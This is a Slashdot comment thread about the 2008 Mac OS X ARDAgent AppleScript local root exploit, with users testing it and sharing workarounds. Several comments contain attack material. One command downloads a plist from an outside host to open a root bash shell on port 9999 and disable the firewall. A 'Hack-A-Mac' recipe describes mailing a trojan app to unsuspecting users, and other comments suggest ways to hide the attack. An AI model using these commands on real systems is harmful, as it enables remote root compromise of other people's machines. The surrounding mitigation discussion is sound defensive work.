365120 2864 -rwsr-xr-x 1 root wheel 1463076 Oct 17 2007 /System//Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
376733 120 -rws--x--x 1 root daemon 61076 Jul 11 2007 /System//Library/Filesystems/AppleShare/check_afp.app/Contents/MacOS/check_afp

Now, I have one of the machines where this exploit isn't working:

%osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

So, somebody out there who can get it to work, see if:

%osascript -e 'tell app "check_afp" to do shell script "whoami"'

works or not. That might need full pathing, I'm not sure.

Re:One more, maybe.

[Charles+Dodgeson]

I suspect that check_afp isn't scriptable: % osascript -e 'tell app "check_afp" to do shell script "whoami"'
24:48: execution error: An error of type -10661 has occurred. (-10661)

Re:One more, maybe.

[That's+What+She+Said]

I tried check_afp and it does not work on my machine if the full path to it isn't given on the command line. After that, I got the same error as you got.

Re:I confirmed it to.

[Poltras]

You have to have a UID lower than your own IQ, or the IQ of the poster. At least that's what I was told.

The exploits - they do nothing!

[Lars+T.]

After about 20 seconds waiting:
23:47: execution error: ARDAgent got an error: Connection is invalid. (-609)
I'm so not impressed.

Re:The exploits - they do nothing!

[jim3e8]

Same exact thing here on OS X 10.4.11.

Intellectual Honesty

[JeffSpudrinski]

Firstly, I want to say I'm impressed.

I'm not a Windows Fanatic or a MacEvangelist. I use both Windows and OSX and they both have strengths and weaknesses.

I've seen waaay too many posts here and abroad about vulnerabilities in every OS out there. They are an unfortunate fact of life the IT Universe. However, too many times, when info is posted about Windows vulnerabilities MacEvangelists scream about how secure OSX is and and how Windows stinks. Conversely, when a vulnerability for OSX is posted, many of the same users write it off as a non-issue, too hard to execute, or some problem with the user's configs rather than an actual vulnerability.
I have seen more than the normal number of folks, however, responding to this article with honesty about this exploit and even testing it further. (Let's just hope the underpaid Apple engineers [see other article about that] are listening).

There are those here, though, who seem intent on writing this off as a non-exploit or trying to explain it away. That's where a concept known as "Intellectual Honesty" comes into play. You have to be honest with yourself about what you know and do. Viruses are a fact of life on computers and, while Apple is closed architecture (which by its very nature makes it MUCH more secure than other OSes), it's only a matter of time before real viruses appear for the Apple platform that just won't be able to be explained away.

This article's exploit is a dangerous one to be sure and there are several equivalent Windows bugs. However, for all it's faults, Microsquash does a reasonable job of patching vulnerabilities carefully. Sometimes patching them right takes a little more time than users like, but the patches usually address the problems (although they do sometimes introduce more).

Apple does an "okay" job of patching vulnerabilities, once they admit that they exist.

There's another article about "carpet bombing" attacks via Safari and IE in Windows, and the responders there are perfect examples of the problems I refer to. A goodly number of them seem to be intent that the problem is Windows' fault and not a problem in Safari. Windows has issues, but the security problems exist in the program that's running and it's the programmer's duty to make sure that the APIs and such are called correctly and not in a manner to allow exploit to occure (too many programmers take easy shortcuts that introduce vulnerabilities).

I hate to think it, but I will probably get the ever lovin' crap flamed out of me for saying all of this.

Let me re-iterate. I'm impressed by a lot of the responders here with the unusually high level of Intellectual Honesty from Mac users than I have seen in the past. Let's hope the trend continues.

p.s. I love the "security is like sex" comment above. Well put.

Re:Intellectual Honesty

[JeffSpudrinski]

Hi, Anonymous.

No...no "Kool Aid" lately (although I do love cranapple juice).

I guess I didn't explain very well (I was trying not to be long-winded).

By "closed architecture", what I was meaning to point out is that apple OS runs on Apple hardware only...[sans a hack ;-) ].

Anyone can build a Windows machine from any combination of hardware they choose (of widely varying quality), but if you run the Apple OS, you're running it on Apple's hardware. In my view, that's simply more secure out of the box and much less prone to driver problems, etc... that can sometimes introduce additional problems. From a reliability standpoint, it's a good idea on Apple's part. From an expense standpoint (can't help it...I'm a cheapskate) that makes their hardware and systems more expensive. Classic example of "you get what you pay for".

No offense (or confusion) intended.

-JS

Re:Intellectual Honesty

[JeffSpudrinski]

Okay...point conceded.

I guess what I should have said was "more dependable" rather than "more secure". Their hardware does run a lot more reliably than Windows machine (in my experience, anyway).

-JS

Re:I confirmed it to.

[That's+What+She+Said]

The joke was not a good one, IMHO, but he simpy meant:

"The trick works through SSH if you know the password of the user currently logged on the target machine."

How smart?

[Gary+W.+Longsine]

I suppose you would need to be at least smart enough not to brag about a 162 IQ. You might want to re-test. And have your blood lead and mercury levels checked.

Re:How smart?

[t-maxx+cowboy]

Yes get that Neurotoxicity checked out.

Re:I confirmed it to.

[Gary+W.+Longsine]

Yeah, it wasn't my best work.

Re:ARDagent

[Sentry21]

Disconfirmed - I don't have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory So, how dangerous is this? Here's an example:

osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can 'nc localhost 9999' and find yourself at a root shell.

To remove, run 'launchctl unload com.apple.bash' 'launchctl unload /System/Library/LaunchDaemons/bash.plist' and then 'rm /System/Library/LaunchDaemons/bash.plist'

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that's easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.

Re:I confirmed it to.

[That's+What+She+Said]

No worries, dude... My nerdy jokes are never understood by my non-nerd friends or family members. I am pretty used to it by now!

I can has exploit?

[omnipotus]

23:47: execution error: ARDAgent got an error: AppleEvent timed out. (-1712) What did I do to magically protect my machine?

Re:This is a serious privilege escalation bug, but

[argent]

No, what's good about Linux, and to a slightly lesser extend OSX, is that Unix is an incredibly simple system at it's core, so there are relatively few possible exploitation vectors and they are all well understood.

Unfortunately KDE, Qt, X11, Gtk, Gnome, and the whole "let's make Linux into Windows" desktop hodgepodge that's layered on top of UNIX[1] is incredibly complex, has many components running with elevated privileges, and while it has fewer exploitation vectors than Windows it's conceptually more complex than the NeXTstep-derived equivalents in OS X.

And on top of that, many linux distros have resurrected the absolutely insane concept of Autorun CDs, something Apple was smart enough to abandon back in the dark ages of floppy distribution.

So, all in all, "do not be so proud of this technological terror". I'd go on, but I've got work to do. :)

[1] No, X11 is not really a UNIX API, it was designed to be platform independent, ran on UNIX and VMS from the start, and completely ignores many of the fundamental design goals of UNIX as well as many of the most useful *results* of those design goals.

It's easier than that..

[theolein]

Just embed the script in an applescript *.app executable, which many clueless users (I know, I am a Mac sysadmin to some of them) will click on, despite the warnings from the system on trying to start an executable from Mail and on first launching the app.

It's almost like Anna_Kournikova.jpg.vbs all over again.

Re:It's easier than that..

[pudge]

Just embed the script in an applescript *.app executable, which many clueless users (I know, I am a Mac sysadmin to some of them) will click on, despite the warnings from the system on trying to start an executable from Mail and on first launching the app. Right. It is yet another possible Trojan Horse vector. Most of us here are hard to trick into this, but most users at large are not.

Re:It's easier than that..

[That's+What+She+Said]

I tried to take out the "osascript -e" part (and the single quotes too), create an AppleScriptand save as a compiled application. It doesn't work.

I just tried a more sophisticated trick:

tell application "Terminal"
        do script "osascript -e 'tell app \"ARDAgent\" to do shell script \"touch /etc/test\"'"
end tell

This works! Double click the app and the file test will be created on /etc.

The only downside to this (for the attacker) is that a Terminal window opens and the user can see the commands. If you use the preflight script trick, the user will see nothing!

Re:It's easier than that..

[theolein]

you can use the same do script command to parse the terminal's PID and kill it.

Re:It's easier than that..

[That's+What+She+Said]

That seems fair, but 1337 H4X0RZ D0 I7 WI7H 57YL3!

Re:It's easier than that..

[theolein]

The real hole is not so much this script, since you need to get something running on a target machine, but the fact that Apple Mail will execute Mac friendly *.app attachments at all just by clicking on them.

Re:It's easier than that..

[poopdeville]

No need to use a compiled application, really. Use Ruby's Cocoa hooks to create a legitimate-looking application bundle, and have the trojan do a Kernel.system("osascrpt -e ... ")

Re:It's easier than that..

[poopdeville]

In fact, I just ran Kernel.system("osascript -e 'tell app \"ARDAgent\" to do shell script \"whoami\"';") in irb, and it worked.

Re:It's easier than that..

[theolein]

An Applescript app is just a bundle, like the Ruby or Python bridges.

Re:This is a serious privilege escalation bug, but

[argent]

I know you're making a joke but there's a known race condition in a similar widely-used command.

Hack-A-Mac in 6 easy steps

[theolein]

1. Open Script Edtor
2. type in the following code

tell application "Terminal"
do script "osascript -e 'tell app \"ARDAgent\" to do shell script \"whoami\"';"
end tell

3.Save as NubileRussianTennisPlayer.app
4.Attach as non Windows friendly attachment to a new mail in Mail.app
5.Send to as many hopefully clueless Mac users as possible.
6.Profit

Re:Hack-A-Mac in 6 easy steps

[That's+What+She+Said]

Remember: you're root just as long as your "whoami" command is running.

So, you have to replace "whoami" with some other command to own the machine...

Re:Hack-A-Mac in 6 easy steps

[theolein]

Believe me, anyone with a bit of knowledge of the shell can wreak havoc from this hole, and they can even do it without the terminal staying open.

Apple must fix this pretty soon.

Re:Hack-A-Mac in 6 easy steps

[msheekhah]

Your forgot the ????.

Recipe for neutralizing it

[goombah99]

Here's a non-destructive way to neutralize it.

cd /System/Library/CoreServices/RemoteManagement/

sudo tar -czf ARDAgent.app.gz ARDAgent.app

sudo chmod 600 ARDAgent.app.gz

This simply hides it in an unreadable tarball.

Re:Recipe for neutralizing it

[patrick42]

Or more simply:

chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

After doing that, I get:

patrick@picasso:~$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
patrick

(Repairing permissions will probably reset this though.)

Re:Recipe for neutralizing it

[Kadin2048]

No, GP was correct. On Mac OS X, ".app" means an application bundle ... which is a directory, not a file.

If you try to gzip an application bundle without putting it in a tarball first, you'll just get a "foo.app/ is a directory; ignored" error.

It's confusing because the Finder doesn't treat application bundles like normal directories, but that's what they are to the filesystem and *nix utilities.

Re:Recipe for neutralizing it

[djw]

Don't forget to delete the original afterwards: sudo rm -rf ARDAgent.app

Re:Recipe for neutralizing it

[Ant+P.]

Sounds a lot like RISC OS's appdirs... I wonder if shift-clicking to get in the folder still works.

Re:Recipe for neutralizing it

[supervillainsf]

Nope, but you can still get in either through a terminal window (bash just sees them as folders ) or from finder ctrl-click->show package contents

Re:Recipe for neutralizing it

[eikonos]

Why use sudo when you could just use the ARDAgent hack instead?
osascript -e 'tell app "ARDAgent" to do shell script "gzip ARDAgent.app"';

Re:Recipe for neutralizing it

[DavidinAla]

Control click on an app's icon and choose "Show contents" and you can see everything.

Re:Recipe for neutralizing it

[aetherworld]

Nononono....

it's: osascript -e 'tell app "ARDAgent" to do shell script "rm -rf ARDAgent.app"';

Re:Recipe for neutralizing it

[SimonTheSoundMan]

OS X applications are very similar, on RISC OS you start a directory with "!" to make it into an application, on OS X you simply add ".app" to the end to make the directory name be recognised as an application.

Re:Recipe for neutralizing it

[entrigant]

Then the command should be:

sudo tar -czf ARDAgent.app.tar.gz ARDAgent.app :)

Re:Recipe for neutralizing it

[mollymoo]

Not sure if you can edit the database manually, but it looks like pkgutil's --edit-pkg and --learn options might do the trick to update the package receipts Repair Permissions uses.

Does ARD continue to work after you've changed the permissions? If it doesn't you might as well just remove it.

Re:Recipe for neutralizing it

[AJGomez]

Does this limit someones ability to legitimately use Apple's ARD to work within a group of OS 10.x systems?

Re:Only need a shell....

[lucas+teh+geek]

$ ssh localhost
Last login: Thu Jun 19 09:35:17 2008
lucas@Hackintosh ~
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
what am I doing wrong? is this fixed in 10.5.3 or something?

It's intermittent, you see...

[Peganthyrus]

Out of three tries:

- the first one just hung; I ctrl-c'd it after a while.
- the second one worked.
- the third one died, with the execution error: ARDAgent got an error: AppleEvent timed out. (-1712) error others are reporting.

(overloaded old 1.25Ghz G4, running 10.4.11 (latest version of Tiger unless they released an update in the past week).

I'm guessing that the osascript command is only willing to wait so long - and my machine's speed and load is such that it's right on the cusp of that time.

Renaming it seemed to work for the moment, though I'm sure it also breaks legit use of Remote Desktop:

$ sudo mv /System/Library/CoreServices/RemoteManagement/ARDAgent.app /System/Library/CoreServices/RemoteManagement/notARDAgent.app
Password: XYZZY
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'18:19: syntax error: No user interaction allowed. (-1713)
$ osascript -e 'tell app "wsiofth" to do shell script "whoami"'
17:18: syntax error: No user interaction allowed. (-1713)

Re:It's intermittent, you see...

[Enoxice]

Password: XYZZY

How did you know the combination to my luggage?

Re:ARDagent

[That's+What+She+Said]

Now THAT is scary...

Didn't work for me

[wzinc]

23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

Maybe it's an Intel-only thing.

another 'exploit'

[pbjones]

use the 'password reset' utility on the install disk,

Nope, not here

[clang_jangle]

Here's the output I get on my Mac (powerpc running os x Tiger version 10.4.11) :

23:78: execution error: ARDAgent got an error: AppleEvent timed out. (-1712)

Doesn't look too scary to me. Some kind of hoax maybe? :)

Solutions, anyone?

[That's+What+She+Said]

There's got to be a temporary solution, while we wait for Apple to fix it.

I don't use Screen Sharing, so I assume sudo chmod 4744 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent will do the trick, huh?

I think this approach is better than deleting or compressing ARDAgent... Is it?

For those that use Screen Sharing, is there a fix?

Re:Solutions, anyone?

[deke_kun]

This fixes it.

Chown the app to a non-root user, and the whoami returns that user.

Have tested ARD afterwards and it still worked for me (Leopard 10.5.3 Intel).

Who wants to bet a security update is out in the next week or so which fixes this?

Bore me with something else

[thethibs]

If you have physical access to a machine and the disk isn't encrypted, you can get root. How dense do you have to be to find this surprising, or even mildly interesting?

Re:Bore me with something else

[antifoidulus]

Its possible to turn off the console and to turn off booting from other drives on macs.

Re:Bore me with something else

[thethibs]

And once you've done that, the circuits are burned so that it can never be reversed.

Re:ARDagent

[Kadin2048]

I don't think the GP was saying that you need to have Screen Sharing enabled for the exploit to work at all; you need to have Screen Sharing turned on for someone to run the exploit without physical access to the machine.

I.e., you can't run it over an SSH session; you need the Finder. The only ways to get access to the Finder are either physically, by sitting down in front of the computer, or by using a screen-sharing application like Screen Sharing (Remote Desktop), or VNC.

That was my understanding, at least.

The exploit works, if you have physical access to the machine, regardless of whether you have Screen Sharing enabled or not. However, it's when you have Screen Sharing turned on that it's possibly a remote root to anyone you let access your screen.

It's a bad vulnerability and one that I'd like to see Apple fix ASAP, but it's several steps down from a true unprivileged remote root. It might have negative consequences for shared and lab machines, but for most home and office users it doesn't seem like it means much, unless you typically allow lots of people remote-desktop/VNC access.

Physical Access Excuse?

[TheNetAvenger]

On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.

What about non personal deployments?

Like corporate installations?
Kiosk installations?
Any small business that wants to secure a machine?
How about a class room that you want kiddies to run games but not wipe the OS?

Physical access MEANS if they can access the hardware (inside the case). It DOES NOT mean typing something on the freaking keyboard, when logged in as a low level user.

In the IT world you password lock boot media, lock cases,etc. If an IT person can't secure a machine without removing the keyboard, there MIGHT be a security problem.

(SlashDot Editors? WTF?)

Re:Physical Access Excuse?

[Sumtingwong]

Where I come from, Physical Access means typing on the machine, not getting inside the box.

Root Account Disabled by Default on Macs

[gyrogeerloose]

Macs come from the factory with the root account disabled--a user has to manually enable it by using the Directory Utility (or System Preferences in earlier versions of OS X). I doubt that many clueless newbies have done this and clueful oldies should know better since there is little reason to run as root under OS X.

So, can someone explain to me how an exploit can get root of there's no root account?

Re:Root Account Disabled by Default on Macs

[John+Meacham]

There is no way to log in as root directly. root still exists, it is anything with uid 0. The program you are telling to run an arbitrary command is running with uid 0 (root) so your command gets executed as root. Just because you can't log in as root, it doesn't mean programs don't run as root.

Re:Root Account Disabled by Default on Macs

[That's+What+She+Said]

So, can someone explain to me how an exploit can get root of there's no root account?

Simple: the root account exists by default. It's not accessible and you can't log-in with it by default. But it's there.

Re:Root Account Disabled by Default on Macs

[gyrogeerloose]

Okay, thanks for the info. Been using OS X since 10.0 and hate admitting there's something I don't know but, alas, there always is.

Re:Oh good

[pudge]

Um. If you say so.

Re:Can we get some sources?

[Whiney+Mac+Fanboy]

It's a submission from an anonymous user that doesn't cite any sources. That's pretty shoddy, even by Slashdot standards.

Are you really so lazy that you need a source for something so trivially replicated?

What's the harm of this?

[commodoresloat]

Is it really bad for an attacker to find out who I am using this "whoami" thingy?

Re:What's the harm of this?

[bhpaddock]

Please be joking =)

Re:it's just a local exploit.

[That's+What+She+Said]

Well... I am one of the people here looking at this problem seriously and acknowledging that it does exist, doing tests and stuff.

I am a Mac user, but I am not being a stupid zealot and dismissing the problem as if it's just some minor glitch.

That said, I can now proceed on correcting you.

Itunes, safari, flash and quicktime are on just about 99.9% of Macs out there, between those 4 products there is hardly a day goes by that there isn't a publicly known vulnerability Come on, check the facts! I don't really know jack about Flash bugs, but saying that "hardly a day goes... blah blah" is false. iTunes, Safari and QuickTime have their issues, but you're exagerating.

Re:This is a serious privilege escalation bug, but

[AndrewNeo]

Mine's even worse than yours!
$ sudo su
#

Re:Oh good

[Free+the+Cowards]

Sarcasm does not make you more handsome or bring you favor with the ladies.

Re:Oh good

[GradiusCVK]

Whoops, sorry about that, I intended to post that comment as a reply to the main article, I happened to be reading your comment when I clicked reply... a few too many drinks tonight methinks :-(

Re:This is a serious privilege escalation bug, but

[slashflood]

And on top of that, many linux distros have resurrected the absolutely insane concept of Autorun CDs, something Apple was smart enough to abandon back in the dark ages of floppy distribution.

Any proof for this claim? It is not like the auto-run that you know from Windows, where the setup.exe or whatever is executed on insert. KDE opens a dialog and asks you if you want the CD to be mounted and I guess the same is true for Gnome, but that's it.

Re:Oh good

[robfoo]

Yeah, right.

Re:ARDagent

[Sentry21]

If you can ssh into an account who is currently using the machine in person (i.e. is logged in) then it will work. As long as the user you are is the currently active user, then it works.

Re:Oh good

[Zero__Kelvin]

"Sarcasm does not make you more handsome or bring you favor with the ladies."

Damn it! Now I'm back to square one trying to figure out how the hell I got so damn good looking, and I'll never figure it out if all these damn woman won't leave me alone!

Re:Oh good

[GradiusCVK]

Do you post that for karma everywhere you see sarchasm on slashdot, or am I just a special case?

Local exploit, snuh!

[billcopc]

Okay, so this is a local root escalation.

#1. How many Apple boxes are used for servers ?

aaaaand

#2. How many Apple users don't already have local root access ?

I'm honestly asking, because I have very little experience with Macs in the workplace. How often will one see a Mac user that doesn't have root access ? In the Windows world, it's very common with Active Directory networks and locked-down corporate desktops... is the same true of Apple shops ?

Re:Local exploit, snuh!

[JustCallMeRich]

#1 - We probably have 5-6 Apple XServes and will grow that to around 12-15. But there are hundreds of WinTel servers corporate wide.

#2 - We are in the midst of standardizing the Macs to corporate standards. They are around 10% - 20% of each site, but they never really had any centralized management until I came on board. Getting a standard build and removing admin rights was one of the first things I got corporate to agree to. The users really love installing their own stuff (like p2p clients, DVD ripping apps, different versions of apps) or changing things in order to 'fix' things like a down server. They complain that they don't have the ability to break their own machines anymore, but the calls for service have gone waaaay down, and their ability to interact with the corporate network, services, and their PC peers have gone waaay up. Just in numbers we have about 600 Mac users in the US, and maybe another 100 in Europe and Asia.

Most of the companies that have been acquired that had Macs, had an outside contractor come in about once a month to do maintenance, bug fixes, etc. Now they complain that it takes a couple of hours to install their scanner driver. I also had another group that used to install their own software complain to me that they all had different versions of the applications. So I removed their admin rights and put them all on the same version. Now they complain that they can't install software one at a time - which would get them back to different versions of the programs.....

The biggest secret to managing Macs is that it's really an easier job than managing PC's (IMHO), but the PC techs think it is harder. The trick is to take away admin rights and use a standard, tested build that is set up by someone who knows what they are doing. Pretty much the same rule as on the PC.

That said - and to get back on topic - ARD (http://www.apple.com/remotedesktop/Apple Remote Desktop) is an invaluable tool and one of the requirements for me taking the job. Looks like the latest version of the ARD client may fix this problem. But if users are turning off the ARD client - how can I push the new, fixed client out to them?

Re:Oh good

[Free+the+Cowards]

First and so far only time. I have no problem with sarcasm in general, but when used as an argumentative device it just makes the user look like a tool.

Let me fix that...

[actionbastard]

chmod 660 /usr/bin/osascript
All better now.
Apple fanbois can now exhale.

Re:Let me fix that...

[actionbastard]

chmod 660 /usr/bin/osascript All better now. Apple fanbois can now exhale.
Sorry. Fat-fingered that one.
chmod 550 /usr/bin/osascript
Now it's really all better.

Re:This is a serious privilege escalation bug, but

[argent]

KDE opens a dialog and asks you if you want the CD to be mounted

I call those "Should I do something stupid" dialogs.

Given that:

* The answer should almost always be "no".
* It's less hassle if it doesn't ask, just doesn't do it.
* Users get trained to answer "yes", because they keep getting them.

Any time you're putting up "Should I do something stupid" dialogs, you're making things easy for people who are trying to use social engineering to install malware.

Here's the history of Apple's experiment with stupid security dialogs in Safari:

http://scarydevil.com/~peter/io/osx-security.html
http://scarydevil.com/~peter/io/apple.html
http://scarydevil.com/~peter/io/apple3.html
http://scarydevil.com/~peter/io/apple4.html

They finally wised up, and removed the "doing something really stupid" bit, by turning off "open Safe files" by default.

Microsoft's been in denial about the same thing since 1997.

http://scarydevil.com/~peter/io/airlines.html

Windows Airlines:
The terminal is very neat and clean, with security barriers every few meters. The attendants are attractive, even if it's kind of creepy how much they want to "help" (especially in the restrooms). The pilots are allegedly very capable, though nobody ever sees them and there's an armed guard by the cockpit door. The fleet of jets it operates are immense. Your jet takes off without a hitch, pushing above the clouds, and at 20,000 feet a message pops up on the seat back in front of you asking "Should this plane explode now?".

Some idiot always answers "Yes".

Windows is so much worse than everyone else that people tend to ignore it when Apple or KDE does something slightly less stupid than ActiveX, but it's still stupid, and putting up a "should this plane explode now?" dialog doesn't eliminate the stupidity.

Re:ARDagent

[cunamara]

On my Mac (1.4.11, PPC) it fails.

Apple's Knowledge Base reports this is 'safe'

[AEton]

Item TS1448 in the Apple support knowledge base addresses this issue and is dated June 6, 2008. The issue was reported by users as early as October.

Users noticed in October that Apple's built-in file system permissions verifier really wanted to delete the ARDAgent program (along with several others) because it was user-executable and setuid root. None of the users seemed to understand exactly what this meant...

Apple's reported fix, and I am not making this up:

The resolution:
You can safely ignore these messages. They are accurate but not a cause for concern.

The entire text below, in case Apple deletes it:
  Mac OS X 10.5: Disk Utility's Repair Disk Permissions reports issues with SUID files

        * Last Modified: June 06, 2008
        * Article: TS1448

        * Old Article: 306925

Symptoms

The following messages may appear in the Disk Utility log window when repairing disk permissions.

Warning: SUID file "usr/libexec/load_hdi" has been modified and will not be repaired.

Warning: SUID file "System/Library/PrivateFrameworks/DiskManagement.framework/Versions/A/Resources/DiskManagementTool" has been modified and will not be repaired.

Warning: SUID file "System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/Resources/Locum" has been modified and will not be repaired.

Warning: SUID file "System/Library/PrivateFrameworks/Install.framework/Versions/A/Resources/runner" has been modified and will not be repaired.

Warning: SUID file "System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/readconfig" has been modified and will not be repaired.

Warning: SUID file "System/Library/PrivateFrameworks/Admin.framework/Versions/A/Resources/writeconfig" has been modified and will not be repaired.

Warning: SUID file "usr/libexec/authopen" has been modified and will not be repaired.

Warning: SUID file "System/Library/CoreServices/Finder.app/Contents/Resources/OwnerGroupTool" has been modified and will not be repaired.

Warning: SUID file "System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent" has been modified and will not be repaired.

"Any message that starts with: 'ACL found but not expected on...'."
Products Affected

Mac OS X 10.5
Resolution

You can safely ignore these messages. They are accurate but not a cause for concern.

Re:Apple's Knowledge Base reports this is 'safe'

[minimis]

That forum thread and knowledge base article aren't connected to this issue at all, except that both involve ARDAgent.

The claim "Apple's built-in file system permissions verifier really wanted to delete the ARDAgent program" is just nonsense.

Re:ARDagent

[falcon5768]

right but that still requires certain things to be open which are not out of the box. Doesnt make it a bad exploit (and one Im particularly POd about as I have to use remote desktop for work) but a normal user would not have to worry too much unless they turned SSH or Remote Desktop on, or someone decided to break into their house.

Re:it's just a local exploit.

[mini+me]

If another application can execute malicious code as the current user, that code can just download the file itself.

Re:How to kill this bug

[commodoresloat]

$ It probably also affects apple remote desktop, though. Gee, ya think?

I tried it - didn't work for me

[userw014]

I tried it and got:

execution error: ARDAgent got an error: "whoami" doesnâ(TM)t understand the do shell script message. (-1708)

This is on MacOSX 10.5.3 (9D34) Darwin 9.3.0, Power PC . I have "Remote Login" and "Remote Management" enabled. "Screen Sharing" is under the control of Remote Management.

Haven't tried it on my Intel Mac, or my iMac G5/Tiger . (The iMac stays at Tiger for BitPim and a bunch of games for the kids.)

Re:I tried it - didn't work for me

[userw014]

On my Intel Mac (10.5.3 (9D34)), "demonstration" script works as reported when I have Remote Management DISABLED. When I enable Remote Management, the behavior I report above occurs again -- I turned on "Remote Management" with ONLY my ID allowed, and with only OBSERVE in 'options' -- just observe, none of the sub-features of observe.

I am sorely tempted to do the "chmod u-s" trick (to turn of the setuid-root), but I'm concerned about the side-effects it might have managing the system.

Re:Oh good

[profplump]

No, but physical access == need additional security regardless of OS security.

This bug is nothing to scoff at, but it does really only affect people who have untrusted users with local/pseudo-local access to machines, and that group already has increased security concerns regardless of bug like this.

Re:Physical access? Have you heard of malware?

[DrgnDancer]

Just tried this on my brand new MacBook (more or less fresh out of the box, less than a week old. I haven't enabled any services, but have upgraded to 10.5.3). Worked like a champ, whoami returns "root". This defintely does work "out of the box".

Re:Can we get some sources?

[Whiney+Mac+Fanboy]

It's only trivially replicated if you have access to a mac. Most of us here probably don't.

1) If you don't have a mac, why do you care about the exploit?

2) If you care that much, but don't have access to Apple hardware, run OS X in virtual machine.

I'm a Mac. And I'm a PC

[patio11]

Mac: Oh %$#& %$#& %$#& %$#&.

PC: I can relate.

Mac: No!! %$#& %$#& %$#&

PC: Don't feel so glum, Mac, it happens to everyone once in a while. Look at it this way -- its a sign you're growing up.

Mac: NOOOOOOOOOOOOOOOOOOOOOOOOOO.

PC: You know, they can do wonderful things these days with firewall software.

Mac: I want to cut myself.

PC: Not a good idea as a root user, Mac.

Mac: *glowers*

PC: I only kid because I love you.

Re:ARDagent

[ncc74656]

Not really, I didn't turn on Remote Desktop Sharing, but I get the same output...

It didn't work for me. I had Remote Desktop Sharing off because I normally use OSXvnc; the alleged attack just sat there until I hit Ctrl-C. Even after enabling Remote Desktop Sharing, it bombed out with an error:

23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

This is on a G4 mini running 10.4.11; YMMV (and it apparently did).

Re:This is a serious privilege escalation bug, but

[Erikderzweite]

And on top of that, many linux distros have resurrected the absolutely insane concept of Autorun CDs, something Apple was smart enough to abandon back in the dark ages of floppy distribution. Can't agree with that. So far the only autorun options are "Open Folder" or "Play with Kaffeine" in case of DVD or "Burn with K3B" if the disk is writable. There are NO autorun.exe auto-executions.
Sure, if you insert a Ubuntu CD in Ubuntu it recognizes that there are packages there and will ask if you want to have the CD added to your repositories. Yet no software will be installed automatically.

Fix using Info.plist

[jediknil]

This may have come too late in the comments for anyone to see it, but if the exploit is active on your system, adding a key to ARDAgent's Info.plist makes the problem go away without disabling ARDAgent altogether. (Whether or not ARDAgent is a security vulnerability itself is another story.)

<key>NSAppleScriptEnabled</key>
<string>YES</string>

That "YES" is not a typo; setting it to "NO" does not fix the problem. AFAICT this makes osascript expect that ARDAgent will implement more of its own AppleScript handlers...which of course, it doesn't.

P.S. I searched for other, similar problem setuid apps, and turned up check_afp.app (which someone else posted already) and, surprisingly, GoogleUpdaterInstaller. Fortunately, even though these apps run setuid, they won't respond to the "do shell script" attack.

Re:Fix using Info.plist

[foo4thought]

This may have come too late in the comments for anyone to see it, but if the exploit is active on your system, adding a key to ARDAgent's Info.plist makes the problem go away without disabling ARDAgent altogether. (Whether or not ARDAgent is a security vulnerability itself is another story.)

<key>NSAppleScriptEnabled</key>
        <string>YES</string>

That "YES" is not a typo; setting it to "NO" does not fix the problem. AFAICT this makes osascript expect that ARDAgent will implement more of its own AppleScript handlers...which of course, it doesn't.

P.S. I searched for other, similar problem setuid apps, and turned up check_afp.app (which someone else posted already) and, surprisingly, GoogleUpdaterInstaller. Fortunately, even though these apps run setuid, they won't respond to the "do shell script" attack.

yes it works once, but it doesn't seem to persist.
    i.e. the process of demonstrating that it works exercises the application into overwriting its Info.plist file and obliterating the edit.

Re:Fix using Info.plist

[bitshark]

Could you elaborate on this patch? I've tried it with no effect, including logging out, switching the type of this key, etc.

Re:Fix using Info.plist

[mzs]

Hmm, this works for me and is persistent across runs. Do this as an admin user:

$ sudo defaults write /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info NSAppleScriptEnabled YES
$ sudo plutil -convert xml1 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info.plist
$ sudo chmod 644 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info.plist

The NSAppleScriptEnabled seems to force the use of the standard applescript dictionary which lacks the "do shell script" action. This is what you get when you try again:

$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

Re:Fix using Info.plist

[jediknil]

